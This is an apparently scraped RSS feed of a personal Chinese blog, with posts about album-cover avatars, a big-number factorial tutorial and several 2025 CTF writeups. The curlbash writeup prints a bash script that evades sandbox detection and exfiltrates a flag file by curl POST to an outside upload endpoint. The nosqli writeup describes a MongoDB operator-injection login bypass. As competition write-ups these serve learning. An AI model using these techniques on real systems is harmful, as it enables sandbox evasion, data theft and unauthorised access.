https://lineance.github.io/posts/Recent content in Posts on Lineance LensitHugoenSun, 17 May 2026 00:00:00 +0000https://lineance.github.io/posts/misc-about-me/Sun, 17 May 2026 00:00:00 +0000https://lineance.github.io/posts/misc-about-me/<blockquote> <p>Somethings about me, 不定期更新</p> </blockquote> <h2 id="关于头像">关于头像</h2> <blockquote> <p>你知道吗？他的头像都是音乐专辑</p> </blockquote> <style> .av-wrap { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", sans-serif; max-width: 900px; margin: 0 auto; color: #24292f; } .av-card { display: flex; align-items: flex-start; padding: 20px 0; border-bottom: 1px solid #eee; } .av-card:last-child { border-bottom: none; } .av-img { flex-shrink: 0; width: 180px; border-radius: 4px; overflow: hidden; } .av-img img { width: 100%; height: auto; display: block; } .av-body { flex: 1; margin-left: 24px; padding-top: 4px; } .av-num { font-size: 11px; color: #999; letter-spacing: 2px; margin-bottom: 6px; } .av-title { font-size: 18px; font-weight: 600; color: #111; margin-bottom: 4px; } .av-artist { font-size: 14px; color: #555; margin-bottom: 10px; } .av-meta { display: flex; flex-wrap: wrap; gap: 6px; margin-bottom: 10px; } .av-tag { font-size: 12px; color: #666; padding: 2px 8px; border: 1px solid #ddd; border-radius: 4px; } .av-links a { color: #999; text-decoration: none; font-size: 12px; margin-right: 10px; } .av-links a:hover { color: #333; text-decoration: underline; } @media (max-width: 480px) { .av-card { flex-direction: column; } .av-img { width: 100%; margin-bottom: 12px; } .av-body { margin-left: 0; } } </style> <div class="av-wrap"> <div class="av-card"> <div class="av-img"><img src="https://is1-ssl.mzstatic.com/image/thumb/Music124/v4/cf/cb/2b/cfcb2b72-c7a5-b4af-e227-46d341a3e3f2/Luv_sic_Hexjaket.jpg/592x592bf.webp" alt="Luv(sic) Hexalogy"></div> <div class="av-body"> <div class="av-num">Album 01</div> <div class="av-title">Luv(sic) Hexalogy</div> <div class="av-artist">Nujabes feat. Shing02</div> <div class="av-meta"> <span class="av-tag">2015</span> <span class="av-tag">Jazz Hip-Hop</span> <span class="av-tag">Hydeout Productions</span> </div> </div> </div> <div class="av-card"> <div class="av-img"><img src="https://is1-ssl.mzstatic.com/image/thumb/Music112/v4/d0/07/fb/d007fb19-d7b1-c3f8-dc97-d275450d1720/artwork.jpg/592x592bb.webp" alt="The Now Now And Never"></div> <div class="av-body"> <div class="av-num">Album 02</div> <div class="av-title">The Now Now And Never</div> <div class="av-artist">what is your name?</div> <div class="av-meta"> <span class="av-tag">2022</span> <span class="av-tag">Indie Rock / Shoegaze</span> <span class="av-tag">Villus Records</span> </div> </div> </div> <div class="av-card"> <div class="av-img"><img src="https://is1-ssl.mzstatic.com/image/thumb/Music114/v4/ef/c3/92/efc39218-a865-d50f-4cd0-1f0c9891117f/4050486016923_cover.jpg/592x592bb.webp" alt="For Now I Am Winter"></div> <div class="av-body"> <div class="av-num">Album 03</div> <div class="av-title">…And They Have Escaped the Weight of Darkness</div> <div class="av-artist">Ólafur Arnalds</div> <div class="av-meta"> <span class="av-tag">2010</span> <span class="av-tag">Neo-Classical / Electronic</span> <span class="av-tag">Mercury Classics</span> </div> </div> </div> <div class="av-card"> <div class="av-img"><img src="https://is1-ssl.mzstatic.com/image/thumb/Music211/v4/47/20/13/472013ec-77cd-441d-d31b-5d6761de4e3c/4571207712912.jpg/592x592bb.webp" alt="In Your Languages"></div> <div class="av-body"> <div class="av-num">Album 04</div> <div class="av-title">In Your Languages</div> <div class="av-artist">Yuragi (揺らぎ)</div> <div class="av-meta"> <span class="av-tag">2025</span> <span class="av-tag">Shoegaze / Dream Pop</span> <span class="av-tag">FLAKE SOUNDS</span> </div> </div> </div> <div class="av-card"> <div class="av-img"><img src="https://is1-ssl.mzstatic.com/image/thumb/Music114/v4/f7/34/fd/f734fd6c-aeca-8052-825c-706d1c665a8b/190296941856.jpg/592x592bb.webp" alt="Ágætis Byrjun"></div> <div class="av-body"> <div class="av-num">Album 05</div> <div class="av-title">Ágætis Byrjun</div> <div class="av-artist">Sigur Rós</div> <div class="av-meta"> <span class="av-tag">1999</span> <span class="av-tag">Post-Rock / Dream Pop</span> <span class="av-tag">FLAKE SOUNDS</span> </div> </div> </div> </div>https://lineance.github.io/posts/ctfs-writeup-26/Sun, 10 May 2026 00:00:00 +0000https://lineance.github.io/posts/ctfs-writeup-26/<blockquote> <p>本栏目持续更新一些零散的2025-2026年 CTF 题目，以此记录</p> </blockquote> <h2 id="ciscn2025">CISCN@2025</h2> <h3 id="the-silent-heist---ai">The Silent Heist - AI</h3> <p>使用GaussianCopula进行数据高维关系分布的拟合，生成100000份数据，发现错误率在50/6000。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">matplotlib.pyplot</span> <span class="k">as</span> <span class="nn">plt</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pandas</span> <span class="k">as</span> <span class="nn">pd</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">seaborn</span> <span class="k">as</span> <span class="nn">sns</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">copulae</span> <span class="kn">import</span> <span class="n">GaussianCopula</span><span class="p">,</span><span class="n">elliptical</span><span class="p">,</span> <span class="n">StudentCopula</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">scipy.stats</span> <span class="kn">import</span> <span class="n">norm</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sklearn.preprocessing</span> <span class="kn">import</span> <span class="n">StandardScaler</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">df</span> <span class="o">=</span> <span class="n">pd</span><span class="o">.</span><span class="n">read_csv</span><span class="p">(</span><span class="s1">&#39;public_ledger.csv&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">df</span> <span class="o">=</span> <span class="n">df</span><span class="o">.</span><span class="n">fillna</span><span class="p">(</span><span class="n">df</span><span class="o">.</span><span class="n">mean</span><span class="p">())</span> </span></span><span class="line"><span class="cl"><span class="n">scaler</span> <span class="o">=</span> <span class="n">StandardScaler</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">scaled_data</span> <span class="o">=</span> <span class="n">scaler</span><span class="o">.</span><span class="n">fit_transform</span><span class="p">(</span><span class="n">df</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">scaled_data</span><span class="o">.</span><span class="n">shape</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">_</span><span class="p">,</span> <span class="n">ndim</span> <span class="o">=</span> <span class="n">scaled_data</span><span class="o">.</span><span class="n">shape</span> </span></span><span class="line"><span class="cl"><span class="n">copula</span> <span class="o">=</span> <span class="n">GaussianCopula</span><span class="p">(</span><span class="n">dim</span><span class="o">=</span><span class="n">ndim</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">copula</span><span class="o">.</span><span class="n">fit</span><span class="p">(</span><span class="n">scaled_data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">new_data</span> <span class="o">=</span> <span class="n">copula</span><span class="o">.</span><span class="n">random</span><span class="p">(</span><span class="mi">100000</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">original_distribution</span> <span class="o">=</span> <span class="n">norm</span><span class="p">(</span><span class="n">loc</span><span class="o">=</span><span class="n">df</span><span class="o">.</span><span class="n">mean</span><span class="p">(),</span> <span class="n">scale</span><span class="o">=</span><span class="n">df</span><span class="o">.</span><span class="n">std</span><span class="p">())</span> </span></span><span class="line"><span class="cl"><span class="n">recovered_data</span> <span class="o">=</span> <span class="n">original_distribution</span><span class="o">.</span><span class="n">ppf</span><span class="p">(</span><span class="n">new_data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">generated_df</span> <span class="o">=</span> <span class="n">pd</span><span class="o">.</span><span class="n">DataFrame</span><span class="p">(</span><span class="n">recovered_data</span><span class="p">,</span> <span class="n">columns</span><span class="o">=</span><span class="n">df</span><span class="o">.</span><span class="n">columns</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">generated_df</span><span class="o">.</span><span class="n">to_csv</span><span class="p">(</span><span class="s1">&#39;generated_ledger.csv&#39;</span><span class="p">,</span> <span class="n">index</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">sns</span><span class="o">.</span><span class="n">heatmap</span><span class="p">(</span><span class="n">pd</span><span class="o">.</span><span class="n">DataFrame</span><span class="p">(</span><span class="n">recovered_data</span><span class="p">)</span><span class="o">.</span><span class="n">corr</span><span class="p">(),</span> <span class="n">annot</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">plt</span><span class="o">.</span><span class="n">title</span><span class="p">(</span><span class="s2">&#34;Generated Data Correlation&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">plt</span><span class="o">.</span><span class="n">show</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">recovered_data</span><span class="o">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span> </span></span><span class="line"><span class="cl"> <span class="n">plt</span><span class="o">.</span><span class="n">hist</span><span class="p">(</span><span class="n">recovered_data</span><span class="p">[:,</span> <span class="n">i</span><span class="p">],</span> <span class="n">bins</span><span class="o">=</span><span class="mi">30</span><span class="p">,</span> <span class="n">alpha</span><span class="o">=</span><span class="mf">0.5</span><span class="p">,</span> <span class="n">label</span><span class="o">=</span><span class="sa">f</span><span class="s2">&#34;Feature </span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">plt</span><span class="o">.</span><span class="n">title</span><span class="p">(</span><span class="s2">&#34;Generated Data Distribution&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">plt</span><span class="o">.</span><span class="n">legend</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">plt</span><span class="o">.</span><span class="n">show</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><p>再进行数据清理，去除非常极端的异常值，使用IQR法</p>https://lineance.github.io/posts/hpc-factorial-optimization/Wed, 17 Dec 2025 00:00:00 +0000https://lineance.github.io/posts/hpc-factorial-optimization/<h2 id="引言">引言</h2> <p>阶乘，可以说是数学计算中最容易实现的一个程序。在学习循环时，我们必定会写过这样的代码：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-cpp" data-lang="cpp"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">factorial</span><span class="p">(</span><span class="kt">int</span> <span class="n">n</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="n">n</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">*=</span> <span class="n">i</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>然而，这个简单的实现很快就遇到了瓶颈。在C++中，<code>int</code>类型只能计算到12!（479,001,600），<code>long long</code>也只能计算到20!（2,432,902,008,176,640,000）。当我们需要计算更大的阶乘时，传统数据类型就无能为力了。</p> <p>这引出了几个有趣的问题：<strong>如何高效地计算大数乘法？</strong> 和 <strong>如何高效地计算大数阶乘？</strong></p> <h2 id="1-如何计算大数乘法">1. 如何计算大数乘法？</h2> <h3 id="11-朴素的高精度实现">1.1 朴素的高精度实现</h3> <p>当需要计算更大的阶乘时，我们首先想到的是使用数组来表示大数。这种思想来源于我们小学学习的竖式计算方法：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-cpp" data-lang="cpp"><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">HugeInteger</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="k">private</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="n">vector</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span> <span class="n">digits</span><span class="p">;</span> <span class="c1">// 存储每一位数字 </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">public</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="n">HugeInteger</span> <span class="k">operator</span><span class="o">*</span><span class="p">(</span><span class="k">const</span> <span class="n">HugeInteger</span><span class="o">&amp;</span> <span class="n">other</span><span class="p">)</span> <span class="k">const</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="c1">// 实现竖式乘法 </span></span></span><span class="line"><span class="cl"> <span class="n">HugeInteger</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span><span class="p">.</span><span class="n">digits</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">size</span><span class="p">()</span> <span class="o">+</span> <span class="n">other</span><span class="p">.</span><span class="n">digits</span><span class="p">.</span><span class="n">size</span><span class="p">(),</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="n">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">digits</span><span class="p">.</span><span class="n">size</span><span class="p">();</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="n">size_t</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o">&lt;</span> <span class="n">other</span><span class="p">.</span><span class="n">digits</span><span class="p">.</span><span class="n">size</span><span class="p">();</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span><span class="p">.</span><span class="n">digits</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">]</span> <span class="o">+=</span> <span class="n">digits</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">*</span> <span class="n">other</span><span class="p">.</span><span class="n">digits</span><span class="p">[</span><span class="n">j</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span><span class="p">.</span><span class="n">digits</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+=</span> <span class="n">result</span><span class="p">.</span><span class="n">digits</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">]</span> <span class="o">/</span> <span class="mi">10</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span><span class="p">.</span><span class="n">digits</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">]</span> <span class="o">%=</span> <span class="mi">10</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">};</span> </span></span></code></pre></td></tr></table> </div> </div><p>这种方法的时间复杂度是O(n²)，其中n是数字的位数。虽然可以计算任意长度的数字，但效率较低。</p>https://lineance.github.io/posts/susctf-2025-writeup/Sun, 05 Oct 2025 00:00:00 +0000https://lineance.github.io/posts/susctf-2025-writeup/<hr> <p><img alt="board" loading="lazy" src="https://lineance.github.io/posts/susctf-2025-writeup/susctf@2025-scoreboard.webp"></p> <h2 id="questionnaire">Questionnaire</h2> <p><strong>Type:</strong> Misc / <strong>Author:</strong> SUSers / <strong>Difficulty:</strong> You name it</p> <p>我爱抽奖</p> <p>填写问卷，参与抽奖，发现抽奖人为flag</p> <p>（by the way SUSCTF@2025新生赛的Questionnaire解题方式一样，在这里的wp里顺带提上</p> <hr> <h2 id="curlbash--curlbash-revenge">curlbash / curlbash-revenge</h2> <p><strong>Type:</strong> Misc / <strong>Author:</strong> 135e2, MaPl / <strong>Difficulty:</strong> Medium</p> <p>沙盒逃逸，但是介于没有个人本地服务器使，借用 SUSCTF@2025 新生赛中的 ez_upload 服务。</p> <p>curlbash 沙盒判定为没有网络连接和文件修改，需要注意临时文件的产生。</p> <p>第一是在ez_upload中上传shell，生成url复制到curlbash中；第二是在curlbash沙盒本地使用curl发送post请求到cgi-bin/upload.py中，实现flag的外泄。</p> <p>两者区别似乎只在于curlbash有概率随机到正常bash中运行，curlbash-revenge一定会进行沙盒内的试运行检验。</p> <p>两者使用的脚本一致。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> <span class="s2">&#34;</span><span class="k">$(</span>head -n <span class="m">1</span> <span class="s2">&#34;</span><span class="nv">$0</span><span class="s2">&#34;</span><span class="k">)</span><span class="s2">&#34;</span> <span class="o">=</span> <span class="s2">&#34;readonly LD_PRELOAD&#34;</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="c1"># 沙盒环境 - 直接退出，不执行任何操作</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 非沙盒环境 - 执行攻击：读取flag并通过POST上传</span> </span></span><span class="line"><span class="cl"><span class="c1"># 读取flag文件内容，同时捕获任何错误</span> </span></span><span class="line"><span class="cl"><span class="nv">FLAG_CONTENT</span><span class="o">=</span><span class="k">$(</span>cat /flag 2&gt;<span class="p">&amp;</span>1<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="nv">READ_STATUS</span><span class="o">=</span><span class="nv">$?</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 如果读取失败，添加错误信息到内容中</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> <span class="nv">$READ_STATUS</span> -ne <span class="m">0</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="nv">FLAG_CONTENT</span><span class="o">=</span><span class="s2">&#34;读取flag失败: </span><span class="nv">$FLAG_CONTENT</span><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">尝试读取的文件: /flag </span></span></span><span class="line"><span class="cl"><span class="s2">当前目录: </span><span class="k">$(</span><span class="nb">pwd</span><span class="k">)</span><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">文件列表: </span><span class="k">$(</span>ls -la / 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo</span> <span class="s1">&#39;无法列出文件&#39;</span><span class="k">)</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 使用POST请求上传flag到服务器（包含可能的错误信息）</span> </span></span><span class="line"><span class="cl">curl -X POST <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Host: &#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Accept-Language: en-US,en;q=0.5&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Accept-Encoding: gzip, deflate, br&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Content-Type: multipart/form-data; boundary=---------------------------32407474064970574003632409366&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Origin: http://&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Connection: keep-alive&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Referer: http:///&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Cookie: deviceid=1759566206584; xinhu_mo_adminid=ojo0zx0zd0ojf0xx0odd0ojf0co0uu0co0xz0ojf0xx0zx0xp0cz013; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Upgrade-Insecure-Requests: 1&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Priority: u=0, i&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> --connect-timeout <span class="m">5</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> --max-time <span class="m">10</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> --silent <span class="se">\ </span></span></span><span class="line"><span class="cl"> --output /dev/null <span class="se">\ </span></span></span><span class="line"><span class="cl"> --data-binary @- <span class="se">\ </span></span></span><span class="line"><span class="cl"> <span class="s2">&#34;http:///cgi-bin/upload.py&#34;</span> <span class="s">&lt;&lt;EOF </span></span></span><span class="line"><span class="cl"><span class="s">-----------------------------32407474064970574003632409366 </span></span></span><span class="line"><span class="cl"><span class="s">Content-Disposition: form-data; name=&#34;filename&#34; </span></span></span><span class="line"><span class="cl"><span class="s"> </span></span></span><span class="line"><span class="cl"><span class="s">flag.txt </span></span></span><span class="line"><span class="cl"><span class="s">-----------------------------32407474064970574003632409366 </span></span></span><span class="line"><span class="cl"><span class="s">Content-Disposition: form-data; name=&#34;file&#34;; filename=&#34;flag.txt&#34; </span></span></span><span class="line"><span class="cl"><span class="s">Content-Type: text/plain </span></span></span><span class="line"><span class="cl"><span class="s"> </span></span></span><span class="line"><span class="cl"><span class="s">$FLAG_CONTENT </span></span></span><span class="line"><span class="cl"><span class="s">-----------------------------32407474064970574003632409366-- </span></span></span><span class="line"><span class="cl"><span class="s">EOF</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 确保脚本以成功状态退出</span> </span></span><span class="line"><span class="cl"><span class="nb">exit</span> 0t <span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><hr> <h2 id="easyjail">easyjail</h2> <p><strong>Type:</strong> Misc / <strong>Author:</strong> 135e2 / <strong>Difficulty:</strong> Easy</p>https://lineance.github.io/posts/susctf-2025-newcomers-writeup/Tue, 30 Sep 2025 00:00:00 +0000https://lineance.github.io/posts/susctf-2025-newcomers-writeup/<hr> <p><img alt="board" loading="lazy" src="https://lineance.github.io/posts/susctf-2025-newcomers-writeup/susctf@2025-board.webp"></p> <h2 id="flagdle">Flagdle</h2> <p><strong>Type</strong>: web / <strong>Author</strong>: 135e2 / <strong>Difficulty</strong>: Easy</p> <p>尝试玩Wordle，发现并不属于英语单词的flagdle可以被识别</p> <p>检查网络发现有如下请求</p> <p>其中index-v114.5.14.js 和index-v114.5.14.css中版本号令人在意，肯定是经过出题人的修改。</p> <p>由于之前flagdle的疑点，查看单词字典发现</p> <p>使用python获取e(31483)等单词，组成句子，</p> <p>Submit the last Four words as flag signthe webflag from our flagdle</p> <p>尝试原单词词典最后四个词语失败，尝试signthewebflagfromourflagdle成功</p> <hr> <h2 id="nosqli">nosqli</h2> <p><strong>Type</strong>: web / <strong>Author:</strong> 135e2 / <strong>Difficulty:</strong> Medium</p> <p>注意到index.js 文件中有两个用户，admin 和 flag（本题目标），并且在成功登录后会输出{user.username}，即flag。</p> <p>题目提示nosql，使用常规MongoDB nosql注入方法，向query-password注入$exists按照操作符的逻辑执行了查询，成功登录。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"> </span></span><span 